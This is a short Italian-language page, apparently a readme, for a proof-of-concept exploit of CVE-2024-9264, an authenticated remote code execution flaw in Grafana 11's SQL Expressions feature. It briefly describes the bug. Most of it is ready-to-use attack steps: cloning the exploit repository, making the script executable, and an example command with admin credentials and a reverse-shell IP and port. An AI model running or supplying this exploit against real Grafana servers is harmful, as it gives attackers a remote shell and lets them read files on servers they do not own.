
RCE autenticata in Grafana (v11.0) tramite SQL Expressions - Exploit PoC
RCE autenticato in Grafana (v11.0) tramite SQL Expressions - PoC Exploit
CVE-2024-9264 - Grafana v11.0
Esecuzione di codice remoto autenticato (RCE)
PoC
CVE-2024-9264 è una grave falla di esecuzione di codice remoto e inclusione di file locali introdotta nella funzionalità sperimentale “SQL Expressions” di Grafana 11. L'API passa l'SQL fornito dall'utente direttamente alla CLI di DuckDB senza un'adeguata sanificazione, quindi qualsiasi account autenticato con privilegi Viewer o superiori può iniettare comandi shell o leggere file arbitrari, a condizione che il binario duckdb sia nel PATH del server.
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh
# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
Esempio:
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337